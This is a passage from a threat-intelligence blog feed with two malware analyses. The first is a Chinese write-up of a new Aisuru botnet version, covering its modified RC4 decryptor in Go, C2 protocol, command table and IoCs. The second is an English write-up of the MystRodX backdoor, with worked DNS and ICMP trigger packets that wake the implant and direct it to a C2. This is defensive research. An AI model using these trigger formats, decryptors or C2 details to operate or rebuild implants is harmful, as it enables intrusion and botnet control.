<p>&#x65B0;&#x6837;&#x672C;&#x4F7F;&#x7528;&#x4E86;&#x9B54;&#x6539;&#x7684;RC4&#x7B97;&#x6CD5;&#xFF0C;&#x5BC6;&#x94A5;&#x4E3A;<code>PJbiNbbeasddDfsc</code>&#xFF0C;&#x8BE5;&#x5BC6;&#x94A5;&#x5728;&#x591A;&#x4E2A;&#x7248;&#x672C;&#x4E2D;&#x90FD;&#x6CA1;&#x6709;&#x53D8;&#x5316;&#xFF0C;&#x6216;&#x8BB8;&#x662F;&#x5411;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x81F4;&#x656C;&#x3002;&#x7B97;&#x6CD5;&#x4FDD;&#x7559;&#x4E86;RC4&#x7684;256&#x5B57;&#x8282;&#x7684;S&#x76D2;&#xFF0C;&#x5728;&#x521D;&#x59CB;&#x5316;&#x548C;&#x751F;&#x6210;&#x5BC6;&#x94A5;&#x6D41;&#x65F6;&#x589E;&#x52A0;&#x65B0;&#x7684;&#x6270;&#x52A8;&#xFF0C;&#x7B49;&#x6548;&#x7684;Golang&#x5B9E;&#x73B0;&#x5982;&#x4E0B;:</p>
<pre><code class="language-go">func AIRASHI_RC4(data []byte) []byte {
	key := make([]uint32, 4)
	keyBytes := []byte(&quot;PJbiNbbeasddDfsc&quot;)
	for i := 0; i &lt; 4; i++ {
		key[i] = binary.BigEndian.Uint32(keyBytes[i*4 : (i+1)*4])
	}

	S := make([]byte, 256)
	i := 13
	for j := 0; j &lt; 256; j++ {
		S[j] = byte(i &amp; 0xff)
		i -= 89
	}

	j := 0
	for i := 0; i &lt; 256; i++ {
		j = (j + int(S[i]) + int(key[i%4]&gt;&gt;(i%32))) % 256
		S[i], S[j] = S[j], S[i]
	}

	seed := uint32(0xE0A4CBD6)
	for i := 0; i &lt; 5; i++ {
		for k := 0; k &lt; 256; k++ {
			seed = 0x41C64E6D*seed + 12345
			t := (seed * uint32(S[k])) &gt;&gt; 24
			t1 := (seed ^ key[(i+k)%4] ^ uint32(S[k])) &amp; 0xff
			S[k] = byte(t1)
			j = (int(t1) + j + int(t)) &amp; 0xff
			S[k] = S[j]
			S[j] = byte(t1)
		}
	}

	i, j, k := 0, 0, 0
	m := uint32(1)
	result := make([]byte, 0, len(data))
	for _, byteVal := range data {
		i = (i + 1) % 256
		j = (j + int(S[i])) % 256
		k = (k + int(S[(i+j)%256])) % 256
		S[i], S[j] = S[j], S[i]
		m = rol32(m, 1)
		if (m &amp; 1) != 0 {
			m ^= 0xD800A4
		}
		t := (S[(k+j)%256] + S[(j+i)%256]) &amp; 0xff
		t1 := ((byte(m) ^ S[t]) &gt;&gt; 4) ^ rol8(byte(m)^S[t], 3)&amp;0xff
		result = append(result, byteVal^t1)
	}
	return result
}
</code></pre>
<p>&#x4EE5;&#x4E0B;&#x56FE;&#x7684;&#x5BC6;&#x6587;&#x4E3A;&#x4F8B;&#xFF1A;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_ciphertxt.png" alt="aisuru_ciphertxt.png" loading="lazy"></p>
<p>&#x4F7F;&#x7528;AIRASHI_RC4&#x89E3;&#x5BC6;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x5F97;&#x5230;&#x7684;&#x660E;&#x6587;&#x662F;&#x4E00;&#x6761;&#x5145;&#x6EE1;&#x6311;&#x8845;&#x610F;&#x5473;&#x7684;&#x4FE1;&#x606F;&#x3002;&#x5BF9;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x53EA;&#x60F3;&#x56DE;&#x5E94;&#x4E00;&#x53E5;&#xFF1A;&#x201C;&#x9601;&#x4E0B;&#x83AB;&#x975E;&#x662F;&#x76AE;&#x75D2;&#x4E86;&#xFF1F;&#x201D;</p>
<blockquote>
<blockquote>
<p>tHiS mOnTh At qiAnXin shitlab a NeW aisurU vErSiOn hIt oUr bOtMoN sYsTeM dOiNg tHe CHAaCha sLiDe<br>
&#x7FFB;&#x8BD1;&#x4E3A;&#x4E2D;&#x6587;&#x4E3A;&#xFF1A;&#x672C;&#x6708;&#x5728;&#x5947;&#x5B89;&#x4FE1;&#x7684;shitlab&#xFF0C;&#x4E00;&#x4E2A;&#x65B0;&#x7684;Aisuru&#x7248;&#x672C;&#x51FA;&#x73B0;&#x5728;&#x4E86;&#x6211;&#x4EEC;&#x7684;BotMon&#x7CFB;&#x7EDF;&#xFF0C;&#x6B63;&#x5728;&#x8DF3;ChaCha&#x821E;&#x3002;</p>
</blockquote>
</blockquote>
<p>&#x5F53;&#x7136;&#xFF0C;AISURU&#x5728;&#x6837;&#x672C;&#x4E2D;&#x9690;&#x85CF;&#x7684;&#x4FE1;&#x606F;&#x8FDC;&#x4E0D;&#x6B62;&#x8FD9;&#x4E00;&#x6761;&#x3002;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x5BF9;&#x6837;&#x672C;&#xFF08;MD5: 053a0abe0600d16a91b822eb538987bca3f3ab55&#xFF09;&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#x5206;&#x6790;&#x3002;&#x4E00;&#x65E6;&#x6210;&#x529F;&#x89E3;&#x5BC6;&#xFF0C;&#x4F60;&#x5C31;&#x4F1A;&#x660E;&#x767D;&#xFF0C;&#x6211;&#x4EEC;&#x4E3A;&#x4F55;&#x4E0B;&#x5B9A;&#x51B3;&#x5FC3;&#x8981;&#x575A;&#x51B3;&#x6253;&#x51FB;&#x8FD9;&#x4E00;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x56E2;&#x4F19;&#x3002;</p>
<h3 id="c2%E8%8E%B7%E5%8F%96">C2&#x83B7;&#x53D6;</h3>
<p>&#x6837;&#x672C;&#x7EE7;&#x7EED;&#x4FDD;&#x6301;&#x4E4B;&#x524D;&#x7684;C2&#x89E3;&#x5BC6;&#x65B9;&#x6CD5;&#xFF0C;&#x901A;&#x8FC7;<code>|</code>&#x5206;&#x5272;&#x4ECE;&#x5B57;&#x7B26;&#x4E32;&#x8868;&#x4E2D;&#x89E3;&#x5BC6;&#x7684;C2&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5F97;&#x5230;&#x591A;&#x4E2A;&#x5B50;&#x57DF;&#x540D;&#x548C;&#x4E3B;&#x57DF;&#x540D;&#xFF0C;&#x518D;&#x901A;&#x8FC7;<code>,</code>&#x5206;&#x5272;&#x591A;&#x4E2A;&#x5B50;&#x57DF;&#x540D;&#xFF0C;&#x793A;&#x4F8B;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>decrypted str: sub1,sub2,sub3|domain.tld

c2_1: sub1.domain.tld
c2_2: sub2.domain.tld
c2_3: sub3.domain.tld
</code></pre>
<p>&#x5728;&#x89E3;&#x6790;&#x57DF;&#x540D;&#x65F6;&#xFF0C;&#x4ECD;&#x4F7F;&#x7528;&#x52A0;&#x5BC6;&#x7684;TXT&#x8BB0;&#x5F55;&#xFF0C;&#x5728;&#x4E4B;&#x524D;&#x7684;blog&#x7684;&#x6837;&#x672C;&#x4E2D;&#x4F7F;&#x7528;base64+ChaCha20&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#xFF0C;&#x65B0;&#x7248;&#x672C;&#x53EA;&#x662F;&#x5F03;&#x7528;&#x4E86;ChaCha20&#xFF0C;&#x6539;&#x7528;&#x5F02;&#x6216;&#x83B7;&#x53D6;IP&#x3002;&#x5BF9;C2&#x89E3;&#x5BC6;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x53C2;&#x9605;Appendix&#x7AE0;&#x8282;&#x7684;CyberChef&#xFF0C;&#x53EA;&#x9700;&#x8981;&#x5C06;C2&#x7684;TXT&#x8BB0;&#x5F55;&#x590D;&#x5236;&#x5230;INPUT&#x5373;&#x53EF;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dns_txt_decode.png" alt="dns_txt_decode.png" loading="lazy"></p>
<h3 id="%E7%BD%91%E9%80%9F%E6%B5%8B%E8%AF%95">&#x7F51;&#x901F;&#x6D4B;&#x8BD5;</h3>
<p>&#x5F00;&#x53D1;&#x8005;&#x5728;&#x6700;&#x65B0;&#x7684;&#x51E0;&#x4E2A;&#x7248;&#x672C;&#x4E2D;&#xFF0C;&#x52A0;&#x5165;&#x4E86;&#x7F51;&#x7EDC;&#x4E0A;&#x4F20;&#x901F;&#x5EA6;&#x6D4B;&#x8BD5;&#x7684;&#x529F;&#x80FD;&#xFF0C;&#x8BE5;&#x529F;&#x80FD;&#x4F7F;&#x7528;&#x4E86;<code>speedtest</code>&#x7684;&#x516C;&#x5171;&#x670D;&#x52A1;</p>
<ol>
<li>GET /speedtest-servers-static.php &#x83B7;&#x53D6;&#x6D4B;&#x8BD5;&#x670D;&#x52A1;&#x5668;</li>
<li>GET /speedtest/latency.txt &#x83B7;&#x53D6;&#x5EF6;&#x8FDF;&#x6700;&#x4F4E;&#x7684;&#x670D;&#x52A1;&#x5668;</li>
<li>&#x5411;&#x5EF6;&#x8FDF;&#x6700;&#x4F4E;&#x7684;&#x670D;&#x52A1;&#x5668;POST&#x968F;&#x673A;&#x6570;&#x636E;&#xFF0C;&#x65F6;&#x95F4;&#x4E3A;10s&#xFF08;&#x90E8;&#x5206;&#x6837;&#x672C;&#x4E3A;100ms&#xFF09;</li>
</ol>
<p>&#x4F46;&#x8BE5;&#x529F;&#x80FD;&#x5E76;&#x4E0D;&#x4F1A;&#x5BF9;&#x7A0B;&#x5E8F;&#x8FD0;&#x884C;&#x548C;C2&#x8FDE;&#x63A5;&#x65B9;&#x9762;&#x4EA7;&#x751F;&#x5F71;&#x54CD;&#xFF0C;&#x53EA;&#x662F;&#x5728;&#x5F97;&#x5230;&#x7ED3;&#x679C;&#x540E;&#x5411;C2&#x62A5;&#x544A;&#x3002;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;&#x6D4B;&#x901F;&#x8FD9;&#x4E00;&#x65B0;&#x589E;&#x52A0;&#x529F;&#x80FD;&#x7684;&#x7684;&#x76EE;&#x7684;&#x662F;&#x4E3A;&#x540E;&#x7EED;&#x7684;&#x4EE3;&#x7406;&#x6307;&#x4EE4;&#x670D;&#x52A1;&#xFF0C;&#x5F88;&#x663E;&#x7136;C2&#x4F1A;&#x5411;&#x4E00;&#x4E9B;&#x7F51;&#x7EDC;&#x826F;&#x597D;&#x7684;&#x8282;&#x70B9;&#x4E0B;&#x53D1;&#x4EE3;&#x7406;&#x6307;&#x4EE4;&#xFF0C;&#x8BA9;&#x5176;&#x6210;&#x4E3A;&#x4F4F;&#x5B85;&#x4EE3;&#x7406;&#x4E2D;&#x7684;&#x4E00;&#x73AF;&#x3002;</p>
<h3 id="%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE">&#x7F51;&#x7EDC;&#x534F;&#x8BAE;</h3>
<p>&#x534F;&#x8BAE;&#x65B9;&#x9762;&#x548C;&#x4E4B;&#x524D;&#x7248;&#x672C;&#x76F8;&#x6BD4;&#xFF0C;&#x6574;&#x4F53;&#x6D41;&#x7A0B;&#x53D8;&#x5316;&#x4E0D;&#x5927;&#xFF0C;&#x4ECD;&#x4FDD;&#x7559;&#x83B7;&#x53D6;&#x5171;&#x4EAB;&#x7684;ChaCha20&#x5BC6;&#x7801;&#x3001;&#x786E;&#x8BA4;&#x673A;&#x5236;&#xFF0C;&#x53EA;&#x662F;&#x5728;&#x6D88;&#x606F;&#x683C;&#x5F0F;&#x548C;&#x6307;&#x4EE4;&#x3001;&#x52A0;&#x5BC6;&#x7B97;&#x6CD5;&#x65B9;&#x9762;&#x505A;&#x4FEE;&#x6539;&#x3002;</p>
<p>&#x65B0;&#x7684;&#x6D88;&#x606F;&#x7531;&#x4E09;&#x90E8;&#x5206;&#x6784;&#x6210;&#xFF1A;&#x6D88;&#x606F;&#x5934;&#x3001;&#x968F;&#x673A;&#x5B57;&#x8282;&#x548C;&#x6D88;&#x606F;&#x4F53;&#xFF0C;&#x5982;&#x56FE;&#x6240;&#x793A;&#x662F;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x4E0A;&#x7EBF;&#x5305;&#xFF1A;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/login_msg-1.png" alt="login_msg.png" loading="lazy"></p>
<p>&#x6D88;&#x606F;&#x5934;&#x957F;&#x5EA6;&#x56FA;&#x5B9A;&#x4E3A;8&#x5B57;&#x8282;&#xFF0C;&#x7531;4&#x4E2A;&#x5B57;&#x6BB5;&#x7EC4;&#x6210;&#xFF1A;</p>
<p>msgType(1byte) + randSize(1byte) + bodySize(2byte) + bodyHash(4byte)</p>
<p>&#x4E0A;&#x7EBF;&#x5305;&#x65B0;&#x589E;&#x5B57;&#x6BB5;&#xFF1A;</p>
<pre><code class="language-c">struct login{
	uint32 stun_ip;  
	uint32 botid_len;
	char botid[botid_len];
	uint32 version;
	uint32 nodename_len;
	char nodename[nodename_len];
	uint32 cwd_len;
	char cwd[cwd_len];
	uint32 kernel_ver_len;
	char kernel_ver[kernel_ver_len];
	uint16 reserve1;
	uint8 reserve2;
	bool support_udp;
}
</code></pre>
<p>&#x65B0;&#x7248;&#x672C;&#x652F;&#x6301;&#x7684;&#x6307;&#x4EE4;&#x53CA;&#x5BF9;&#x5E94;&#x7684;&#x529F;&#x80FD;&#x63CF;&#x8FF0;&#x5982;&#x4E0B;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>msgType</th>
<th>desc</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>get shared net key</td>
</tr>
<tr>
<td>1</td>
<td>key info</td>
</tr>
<tr>
<td>2</td>
<td>confirm key</td>
</tr>
<tr>
<td>3</td>
<td>login info</td>
</tr>
<tr>
<td>4</td>
<td>heartbeat</td>
</tr>
<tr>
<td>5</td>
<td>exit</td>
</tr>
<tr>
<td>6</td>
<td>attack</td>
</tr>
<tr>
<td>7</td>
<td>execute cmd</td>
</tr>
<tr>
<td>8</td>
<td>new cnc</td>
</tr>
<tr>
<td>9</td>
<td>reverse shell</td>
</tr>
<tr>
<td>10</td>
<td>proxy</td>
</tr>
<tr>
<td>101</td>
<td>report telnet scan</td>
</tr>
<tr>
<td>201</td>
<td>report killer</td>
</tr>
<tr>
<td>202</td>
<td>report netspeed</td>
</tr>
</tbody>
</table>
<p>&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x65B0;&#x6837;&#x672C;&#x4E0D;&#x4EC5;&#x652F;&#x6301;DDoS&#x653B;&#x51FB;&#xFF0C;&#x8FD8;&#x652F;&#x6301;Proxy&#x3002;&#x968F;&#x7740;&#x5168;&#x7403;&#x6267;&#x6CD5;&#x673A;&#x6784;&#x5BF9;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#x7684;&#x6253;&#x51FB;&#x529B;&#x5EA6;&#x4E0D;&#x65AD;&#x52A0;&#x5927;&#xFF0C;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#x96C6;&#x56E2;&#x5BF9;&#x533F;&#x540D;&#x5316;&#x670D;&#x52A1;&#x7684;&#x9700;&#x6C42;&#x65E5;&#x76CA;&#x589E;&#x957F;&#x3002;&#x6B63;&#x6240;&#x8C13;&#x6709;&#x9700;&#x6C42;&#x7684;&#x5730;&#x65B9;&#xFF0C;&#x5C31;&#x6709;&#x5229;&#x76CA;&#x3002;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x63A7;&#x5236;&#x7684;&#x8282;&#x70B9;&#x5929;&#x7136;&#x9002;&#x5408;&#x6784;&#x5EFA;&#x4F4F;&#x5B85;&#x4EE3;&#x7406;&#xFF0C;&#x4ECE;&#x6211;&#x4EEC;&#x7684;&#x76EE;&#x524D;&#x79EF;&#x7D2F;&#x7684;&#x6848;&#x4F8B;&#x6765;&#x770B;&#xFF0C;&#x8FD9;&#x4F3C;&#x4E4E;&#x662F;&#x8FD1;&#x5E74;&#x6765;DDoS&#x5708;&#x7684;&#x4E00;&#x4E2A;&#x6F6E;&#x6D41;&#xFF0C;&#x628A;&#x4E1A;&#x52A1;&#x4ECE;&#x5355;&#x4E00;&#x7684;&#x653B;&#x51FB;&#xFF0C;&#x6269;&#x5C55;&#x5230;&#x7F51;&#x7EDC;&#x4EE3;&#x7406;&#x3002;</p>
<p>&#x6211;&#x4EEC;&#x5728;<code>XLab&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;</code>&#x4E2D;&#x5B9E;&#x73B0;&#x4E86;Aisuru&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#xFF0C;&#x548C;&#x9884;&#x671F;&#x4E00;&#x6837;&#xFF0C;&#x4E0D;&#x4EC5;&#x63A5;&#x6536;&#x5230;&#x5E38;&#x89C4;&#x7684;DDoS&#x653B;&#x51FB;&#x6307;&#x4EE4;&#xFF0C;&#x8FD8;&#x63A5;&#x5230;&#x548C;Proxy&#x76F8;&#x5173;&#x7684;&#x6307;&#x4EE4;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_cmdtype.png" alt="aisuru_cmdtype.png" loading="lazy"></p>
<p>&#x5F88;&#x663E;&#x7136;&#xFF0C;Aisuru &#x5DF2;&#x4E0D;&#x518D;&#x6EE1;&#x8DB3;&#x4E8E; DDoS &#x653B;&#x51FB;&#x8FD9;&#x4E00;&#x5355;&#x4E00;&#x4E1A;&#x52A1;&#x6A21;&#x5F0F;&#xFF0C;&#x5F00;&#x59CB;&#x6D89;&#x8DB3;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x9886;&#x57DF;&#xFF0C;&#x8BD5;&#x56FE;&#x5145;&#x5206;&#x5229;&#x7528;&#x5176;&#x624B;&#x4E2D;&#x5E9E;&#x5927;&#x7684;&#x8282;&#x70B9;&#x8D44;&#x6E90;&#xFF0C;&#x4EE5;&#x8C0B;&#x6C42;&#x66F4;&#x591A;&#x7ECF;&#x6D4E;&#x5229;&#x76CA;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_proxy.png" alt="aisuru_proxy.png" loading="lazy"></p>
<h2 id="ioc">IoC</h2>
<h3 id="c2">C2</h3>
<pre><code>coerece[.ilovegaysex[.su
approach[.ilovegaysex[.su
ministry[.ilovegaysex[.su
lane[.ilovegaysex[.su
a.6mv1eyr328y6due83u3js6whtzuxfyhw[.ru
</code></pre>
<h3 id="reportdownload-server">Report/Download Server</h3>
<pre><code>u[.ilovegaysex[.su
updatetoto[.tw
</code></pre>
<h3 id="proxy-relay-c2">Proxy Relay C2</h3>
<pre><code>194.46.59[.169	United Kingdom|England|Exeter	AS206509|KCOM GROUP LIMITED
104.171.170[.241	United States|Virginia|Ashburn	AS7922|Comcast Cable Communications, LLC
104.171.170[.253	United States|Virginia|Ashburn	AS7922|Comcast Cable Communications, LLC
107.173.196[.189	United States|New York|Buffalo	AS36352|ColoCrossing
64.188.68[.193	United States|District of Columbia|Washington	AS46339|CSDVRS, LLC
78.108.178[.100	Czech Republic|Praha, Hlavni mesto|Prague	AS62160|Yes Networks Unlimited Ltd
</code></pre>
<h3 id="sample">Sample</h3>
<pre><code>09894c3414b42addbf12527b0842ee7011e70cfd
51d9a914b8d35bb26d37ff406a712f41d2075bc6
616a3bef8b0be85a3c2bc01bbb5fb4a5f98bf707
ccf40dfe7ae44d5e6922a22beed710f9a1812725
26e9e38ec51d5a31a892e57908cb9727ab60cf88
08e9620a1b36678fe8406d1a231a436a752f5a5e
053a0abe0600d16a91b822eb538987bca3f3ab55
</code></pre>
<h2 id="appendix">Appendix</h2>
<h3 id="cyberchef">CyberChef</h3>
<pre><code>https://gchq.github.io/CyberChef/#recipe=Fork(&apos;%5C%5Cn&apos;,&apos;%5C%5Cn&apos;,false)From_Base64(&apos;A-Za-z0-9%2B/%3D&apos;,true,false)XOR(%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;ca%20fe%20ba%20be&apos;%7D,&apos;Standard&apos;,false)To_Hex(&apos;Space&apos;,0)Change_IP_format(&apos;Hex&apos;,&apos;Dotted%20Decimal&apos;)&amp;input=Im9XamNxZz09Ig0KIm9XamVuZz09Ig0KIm9XallCdz09Ig0KIjU2NGtMZz09Ig&amp;ieol=CRLF

</code></pre>
]]></content:encoded></item><item><title><![CDATA[MystRodX: The Covert Dual-Mode Backdoor Threat]]></title><description><![CDATA[<h1 id="background">Background</h1>
<p>On June 6, 2025, <strong>XLab&apos;s Cyber Threat Insight and Analysis System(CTIA)</strong> picked up activity from IP 139.84.156.79 distributing a suspicious ELF file&#x2014;dst86.bin&#x2014;with a low VirusTotal hit rate of only 4/65. While conventional scanners labeled it as <strong>Mirai</strong></p>]]></description><link>https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/</link><guid isPermaLink="false">68aef33e428efe0001a24dce</guid><category><![CDATA[APT]]></category><category><![CDATA[Backdoor]]></category><category><![CDATA[Traffic Signaling]]></category><category><![CDATA[EN]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Wed, 27 Aug 2025 14:11:28 GMT</pubDate><content:encoded><![CDATA[<h1 id="background">Background</h1>
<p>On June 6, 2025, <strong>XLab&apos;s Cyber Threat Insight and Analysis System(CTIA)</strong> picked up activity from IP 139.84.156.79 distributing a suspicious ELF file&#x2014;dst86.bin&#x2014;with a low VirusTotal hit rate of only 4/65. While conventional scanners labeled it as <strong>Mirai</strong>, our AI module remained silent. That mismatch caught our attention.</p>
<p>Turns out, it wasn&#x2019;t Mirai. It was a dropper&#x2014;and what it delivered was a brand-new backdoor, unrelated to known Mirai strains. We&#x2019;ve named it <strong>MystRodX</strong>, based on its propagation filename dst, the internal class name cmy_, and its multi-layer XOR encryption schemes.</p>
<p><strong>MystRodX</strong> is a typical backdoor implemented in C++, supporting features like file management, port forwarding, reverse shell, and socket management. Compared to typical backdoors, MystRodX stands out in terms of <strong>stealth</strong> and <strong>flexibility</strong>.</p>
<ul>
<li>
<p><strong>Stealth</strong> is achieved through a differentiated encryption strategy for various levels of sensitive information:</p>
<ol>
<li>VM &amp; Debugger detection-related sensitive strings are encrypted using single-byte XOR.</li>
<li>AES keys, Payloads, and Trigger packets are encrypted using a custom  &quot;transform algorithm&quot;.</li>
<li>Configuration is encrypted using AES in CBC mode.</li>
</ol>
</li>
<li>
<p><strong>Flexibility</strong> is demonstrated by MystRodX&apos;s ability to dynamically enable different functional features based on its configuration, such as choosing between <strong>TCP or HTTP</strong> for network communication, and deciding whether to use <strong>plaintext or AES encryption</strong> for traffic.</p>
</li>
</ul>
<p>One of the most interesting features is its support for a <strong>wake-up mode</strong>, meaning MystRodX can be configured as a <strong>passive backdoor</strong> that is activated by specific <strong>DNS</strong> or <strong>ICMP</strong> network packets without the need for open ports.</p>
<p>One config field sets a activation timestamp. In the samples we caught, the earliest was set to <code>January 7, 2024, 23:10:20</code>&#x2014;meaning this thing has been hiding in networks for over 20 months, completely under the radar. Through XLab&#x2019;s C2 hunting platform, we found <strong>three live C2s&#x2014;and evidence of more uncaught samples in the wild</strong>. Given its stealth and low profile, we&#x2019;re breaking down MystRodX now. It&#x2019;s time to expose a long-lingering threat&#x2014;and help defenders hunt it down.</p>
<h1 id="passive-mode">Passive Mode</h1>
<p>When the <code>Backdoor Type</code> is set to 1 in the configuration, MystRodX enters passive backdoor mode. In this state, it uses a RAW socket to monitor all incoming traffic&#x2014;without binding to any open port. It can be activated by specially crafted DNS or ICMP packets.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_rawsock.png" alt="dst_rawsock.png" loading="lazy"></p>
<p>The activation message is encrypted using the Transform algorithm (detailed in the Appendix). Once decrypted, the payload follows this structure:<br>
<code>Magic (4 bytes) + Protocol (4 bytes) + Port (4 bytes) + C2</code>.<br>
If the Magic value is verified, MystRodX establishes communication with the C2 using the specified protocol and awaits further commands.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_connect.png" alt="dst_connect.png" loading="lazy"></p>
<p>Unlike well-known stealth backdoors like SYNful Knock, which manipulates TCP header fields to hide commands, MystRodX uses a simpler yet effective approach: it hides activation instructions directly in the payload of ICMP packets or within DNS query domains.</p>
<h2 id="dns-trigger">DNS Trigger</h2>
<p>A valid DNS trigger packet must follow the format:<code>www.DomainName.com</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_dnspacket_mask.png" alt="dst_dnspacket_mask.png" loading="lazy"></p>
<p>The DomainName portion is  <code>{9-byte mask}UBw98KzOQyRpoSgk5+ViISKmpC6ubi7vao=</code>. When this string is Base64-decoded, it produces the following ciphertext:</p>
<pre><code>00000000: C5 E4 F2 A7 11 73 DD 40  70 F7 C2 B3 39 0C 91 A6  .....s.@p...9...
00000010: 84 A0 93 9F 95 88 84 8A  9A 90 BA B9 B8 BB BD AA  ................
</code></pre>
<p>This ciphertext is then decrypted using the <strong>Transform algorithm</strong> in the Appendix with the parameters:</p>
<ul>
<li><code>magic</code>: <code>0x0d</code></li>
<li><code>magic2</code>: <code>0xaa</code> (the last byte of the ciphertext)</li>
<li><code>key</code>: <code>key_for_backdoor</code></li>
</ul>
<p>The decryption yields the plaintext activation payload</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_dnspayload.png" alt="dst_dnspayload.png" loading="lazy"></p>
<p>Parsing this plaintext reveals:</p>
<ul>
<li><strong>Magic</strong>: <code>&quot;CAT&quot;</code></li>
<li><strong>Protocol</strong>: <code>TCP</code></li>
<li><strong>Port</strong>: <code>0x1f4a</code> (8010)</li>
<li><strong>C2 IP</strong>: <code>149.28.137.254</code></li>
</ul>
<p>If the Magic value matches, MystRodX initiates a connection to <code>149.28.137.254:8010</code> and awaits further instructions.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_dnsc2.png" alt="dst_dnsc2.png" loading="lazy"></p>
<h2 id="icmp-trigger">ICMP Trigger</h2>
<p>Next, let&apos;s examine the ICMP trigger packet. This time, we&apos;ll take a proactive approach, constructing the packet and observing the sample&apos;s behavior.</p>
<p>First, we craft a simple ICMP ping request:<code> 08 00 00 00 30 39 00 01</code>. Then, we construct the PAYLOAD, specifying the C2 server as 192.168.96.1, port 443, and using the HTTP protocol:</p>
<pre><code>00000000: 43 41 54 00 01 00 00 00  BB 01 00 00 31 39 32 2E  CAT.........192.
00000010: 31 36 38 2E 39 36 2E 31  00 00 00 00 00 00 00 00  168.96.1........
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
</code></pre>
<p>Next, we apply the Transform algorithm with the magic2 parameter set to 0x9f to encrypt the payload. Finally, we combine the ICMP header with the encrypted payload to form the complete ICMP packet.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_icmppacket_mask.png" alt="dst_icmppacket_mask.png" loading="lazy"></p>
<p>Upon receiving the ICMP packet, MystRodX establishes a communication connection with <code>192.168.96.1:443</code> and sends an HTTP-formatted check-in message. This behavior aligns perfectly with our expectations, confirming the accuracy of our analysis.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_proof.png" alt="dst_proof.png" loading="lazy"></p>
<h1 id="digging-deeper">Digging Deeper</h1>
<p>In the two captured MystRodX samples, the configured C2 servers have no active ports open. After completing reverse analysis, we have a question: Is MystRodX still an active threat or has it been abandoned? To answer this, we conducted several investigations from both BOT and C2 perspectives using XLab&#x2019;s C2 hunting platform.</p>
<h2 id="0x1-activating-bots">0x1: Activating Bots</h2>
<p>We sent DNS/ICMP activation packets across the internet to trigger MystRodX backdoors in passive mode, aiming to identify potential victims. Unfortunately, aside from our test IPs, no valid check-in responses were received. Possible reasons include: wild MystRodX samples may not have passive mode enabled, or they use new keys, magic values, or configurations, causing our activation packets to fail.</p>
<h2 id="0x2-probing-c2s">0x2: Probing C2s</h2>
<p>With the support of active C2 probing services, we successfully identified three C2 servers that are still active in the wild. These servers responded to the online packets and sent a command 7 to the bots, requesting them to enable traffic encryption. They have been active since 2024, demonstrating the continued presence of the MystRodX threat.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_newc2.png" alt="dst_newc2.png" loading="lazy"></p>
<p>MystRodX configurations include RSA public keys for decrypting command 7. Attackers typically use distinct keys for different campaigns, with two known keys linked to the &#x201C;neybquno&#x201D; and &#x201C;zoufkcfr&#x201D; campaigns. In command 7 packets, a 256-byte segment at offset 0x110 contains the MagicString ciphertext. MystRodX enables traffic encryption only if the decrypted MagicString matches the hardcoded &#x201C;0x68abut.&#x201D; <strong>This allows us to link C2s to known campaigns.</strong></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_magicstring.png" alt="dst_magicstring.png" loading="lazy"></p>
<p>Among the three newly discovered active C2 servers, only the command 7 issued by 149.28.137.254 could be successfully decrypted using known public keys. This indicates that the other two C2s (156.244.6.68 and 185.22.153.228) belong to an as-yet unknown attack campaign, meaning <strong>there are definitely uncaptured MystRodX samples in the wild.</strong></p>
<h1 id="detection-analysis">Detection Analysis</h1>
<p>Over the past two months, the detection rate for MystRodX samples has slightly increased, now reaching 6/65. The main label remains Mirai.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_vt.png" alt="dst_vt.png" loading="lazy"></p>
<p>We speculate that some antivirus software use the Mirai label because the sample uses Mirai&apos;s classic single-byte XOR encryption for strings related to virtual machines and debuggers.</p>
<table>
<thead>
<tr>
<th>vmware</th>
<th>vbox</th>
<th>phoenix</th>
</tr>
</thead>
<tbody>
<tr>
<td>innotek</td>
<td>lldb</td>
<td>strace</td>
</tr>
</tbody>
</table>
